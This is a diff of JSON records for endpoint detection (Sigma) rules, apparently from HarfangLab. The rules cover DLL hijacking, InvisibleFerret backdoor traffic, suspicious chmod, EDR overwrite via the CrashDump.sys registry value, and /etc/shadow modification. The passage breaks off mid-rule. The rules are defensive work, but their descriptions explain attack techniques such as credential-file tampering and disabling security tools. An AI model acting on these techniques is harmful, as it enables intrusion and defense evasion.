+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_bdeuisrv.yml",
+ "content": "title: DLL Hijacking via bdeuisrv.exe\nid: 059bfeb6-d7ab-49e8-995d-d3c4bca73b53\ndescription: |\n Detects potential Windows DLL Hijacking via bdeuisrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdeuisrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53",
+ "rule_name": "DLL Hijacking via bdeuisrv.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via bdeuisrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.587052Z",
+ "creation_date": "2026-03-23T11:45:34.587056Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.587064Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_dwwin.yml",
+ "content": "title: DLL Hijacking via dwwin.exe\nid: 059d6ada-8f39-4f7f-a79a-a0e3ef21e910\ndescription: |\n Detects potential Windows DLL Hijacking via dwwin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dwwin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910",
+ "rule_name": "DLL Hijacking via dwwin.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via dwwin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.619386Z",
+ "creation_date": "2026-03-23T11:45:34.619388Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.619392Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/",
+ "https://objective-see.org/blog/blog_0x7A.html",
+ "https://www.group-ib.com/blog/apt-lazarus-python-scripts/",
+ "https://attack.mitre.org/techniques/T1555/003/"
+ ],
+ "name": "t1555_003_invisibleferret_backdoor_linux.yml",
+ "content": "title: InvisibleFerret Backdoor Communication Detected (Linux)\nid: 05b15125-dd13-43a6-aa65-67a40e6b9fc1\ndescription: |\n Detects network communications related to the InvisibleFerret backdoor.\n InvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\n InvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\n It is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\n - https://objective-see.org/blog/blog_0x7A.html\n - https://www.group-ib.com/blog/apt-lazarus-python-scripts/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/10/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.t1555.003\n - attack.command_and_control\n - attack.t1571\n - attack.exfiltration\n - attack.t1041\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.ThreatActor.Lazarus\n - classification.Linux.ThreatActor.DPRK\n - classification.Linux.Malware.InvisibleFerret\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection:\n ProcessCommandLine: 'python* /home/*/.npl'\n ProcessGrandparentImage: '/node'\n DestinationPort:\n - '1224'\n - '2245'\n\n condition: selection\nlevel: critical\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1",
+ "rule_name": "InvisibleFerret Backdoor Communication Detected (Linux)",
+ "rule_description": "Detects network communications related to the InvisibleFerret backdoor.\nInvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\nInvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\nIt is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
+ "rule_creation_date": "2024-10-25",
+ "rule_modified_date": "2025-02-14",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.collection",
+ "attack.command_and_control",
+ "attack.credential_access",
+ "attack.exfiltration"
+ ],
+ "rule_technique_tags": [
+ "attack.t1041",
+ "attack.t1056.001",
+ "attack.t1555.003",
+ "attack.t1571"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.608259Z",
+ "creation_date": "2026-03-23T11:45:34.608263Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.608270Z",
+ "rule_level": "medium",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1222/002/"
+ ],
+ "name": "t1222_002_binary_chmodx_susp_directory.yml",
+ "content": "title: Suspicious Binary Made Executable\nid: 05e6ac9c-7eac-44f4-a137-10196a85ae1b\ndescription: |\n Detects an attributes change on a file to make it executable in an uncommon directory.\n Adversaries may set the execute bit on a file before executing it.\n Is it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\nreferences:\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/07/30\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n Kind: 'chmod'\n PrettyMode|contains: 'x'\n Image|endswith: '/chmod'\n\n selection_path:\n Path|startswith:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n selection_ancestors:\n ProcessAncestors|contains:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n exclusion_unix:\n Path: '/private/tmp/.*-unix'\n\n exclusion_adobe:\n Path: '/private/tmp/com.adobe.acrobat.DC/acrobat.plist'\n ProcessCommandLine: '/bin/chmod -R 777 /tmp/com.adobe.acrobat.DC'\n\n exclusion_adobe_updater:\n - Path: '/private/tmp/com.adobe.acrobat.updater'\n ProcessCommandLine: 'chmod o+w /tmp/com.adobe.acrobat.updater'\n - Path: '/private/tmp/com.adobe.AcrobatRefreshManager'\n ProcessCommandLine: 'chmod go= /tmp/com.adobe.AcrobatRefreshManager'\n\n exclusion_ansible:\n Path: '/private/tmp/ansible-tmp-*'\n ProcessCommandLine|startswith: 'chmod u+x /tmp/ansible-tmp-'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n ProcessGrandparentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n\n exclusion_dotnet:\n ProcessParentCommandLine|contains|all:\n - 'dotnet'\n - 'install'\n\n exclusion_jamf:\n - Path: '/Users/Shared/jamfdata'\n ProcessCommandLine: 'chmod -R o-w /System/Volumes/Data/Users/Shared'\n - ProcessParentCommandLine|startswith: '/bin/bash /library/application support/jamf/'\n\n exclusion_maxon:\n Path|startswith:\n - '/Users/Shared/Maxon'\n - '/Users/Shared/Red Giant'\n ProcessCommandLine|startswith:\n - 'chmod -R a+w /Users/Shared/Maxon'\n - 'chmod -R a+w /Users/Shared/Red Giant'\n\n exclusion_tunnelblick:\n Path: '/private/var/root/Library/Application Support/Tunnelblick'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n exclusion_cisco:\n ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/cisco/secureclient/temp/downloader/vpndownloader.sh'\n - '/bin/bash /opt/cisco/anyconnect/temp/downloader/vpndownloader.sh'\n\n exclusion_cyberwatch:\n ProcessParentCommandLine: 'find /etc/cyberwatch-agent/ -type d -exec chmod 750 {} ;'\n\n exclusion_homebrew:\n ProcessAncestors|contains: '|/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby|'\n\n exclusion_batchmod:\n ProcessParentImage: '/Volumes/Rescue HD/Outils/Utilitaires/BatChmod*/BatChmod.app/Contents/MacOS/BatChmod'\n\n exclusion_munki:\n ProcessParentImage: '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_node:\n ProcessAncestors|contains: '/.nvm/versions/node/v*/bin/node|'\n\n exclusion_claude:\n ProcessGrandparentCommandLine:\n - 'claude'\n - 'node /Users/*/.nvm/versions/node/v*/bin/claude'\n - '*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude *'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b",
+ "rule_name": "Suspicious Binary Made Executable",
+ "rule_description": "Detects an attributes change on a file to make it executable in an uncommon directory.\nAdversaries may set the execute bit on a file before executing it.\nIs it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\n",
+ "rule_creation_date": "2024-07-30",
+ "rule_modified_date": "2025-11-17",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1204.002",
+ "attack.t1222.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.085767Z",
+ "creation_date": "2026-03-23T11:45:34.085769Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.085774Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg",
+ "https://attack.mitre.org/techniques/T1562/001/"
+ ],
+ "name": "t1562_001_executable_file_overwritten_using_crashdump.yml",
+ "content": "title: Executable File Overwritten using CrashDump.sys\nid: 05ef230b-2d48-4e49-82a9-20e1fce73c9e\ndescription: |\n Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\n By modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\n Threat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\n It is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\nreferences:\n - https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/02/11\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\DedicatedDumpFile'\n Details|endswith:\n - '.exe'\n - '.sys'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details|endswith: '\\dedicateddumpfile.sys'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e",
+ "rule_name": "Executable File Overwritten using CrashDump.sys",
+ "rule_description": "Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\nBy modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\nThreat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\nIt is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\n",
+ "rule_creation_date": "2025-02-11",
+ "rule_modified_date": "2025-08-20",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1112",
+ "attack.t1562.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "06168646-4339-42be-bcf4-a8f6ef23f53d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.622141Z",
+ "creation_date": "2026-03-23T11:45:34.622143Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.622148Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
+ "https://attack.mitre.org/techniques/T1003/008/",
+ "https://attack.mitre.org/techniques/T1078/"
+ ],
+ "name": "t1003_008_etc_shadow_modified.yml",
+ "content": "title: File /etc/shadow Modified\nid: 06168646-4339-42be-bcf4-a8f6ef23f53d\ndescription: |\n Detects a suspicious attempt to modify /etc/shadow.\n This file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\n It is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/16\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/shadow'\n - TargetPath: '/etc/shadow'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'chmod'\n - 'chown'\n\n exclusion_common:\n ProcessImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/usr/bin/sudo'\n - '/usr/bin/su'\n - '/usr/sbin/sshd'\n - '/usr/sbin/cron'\n - '/usr/sbin/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '/usr/bin/passwd'\n - '/usr/sbin/usermod'\n - '/usr/sbin/useradd'\n - '/usr/sbin/userdel'\n - '/usr/bin/chage'\n - '/kaniko/executor'\n - '/usr/sbin/chpasswd'\n - '/bin/chmod'\n - '/bin/adduser'\n - '/usr/bin/podman'\n - '/usr/bin/rootlesskit'\n - '/usr/sbin/pwconv'\n - '/usr/bin/chsh'\n - '/usr/bin/systemd-sysusers'\n - '/usr/lib/gdm3/gdm-session-worker'\n - '/usr/lib/snapd/snap-update-ns'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_containerd:\n ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_busybox_adduser:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|startswith: 'adduser '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n\n exclusion_docker2:\n ProcessImage: '*/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_passwd_busybox:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|contains:\n - 'passwd '\n - 'chown '\n - 'chpasswd '\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_buildah1:\n ProcessCommandLine|startswith: 'storage-applyLayer'\n ProcessParentImage: '/usr/bin/buildah'\n\n exclusion_buildah2:\n - ProcessCommandLine|startswith: 'buildah-in-a-user-namespace'\n - ProcessGrandparentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n - ProcessParentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n\n exclusion_salt_minion:\n - ProcessCommandLine:\n - 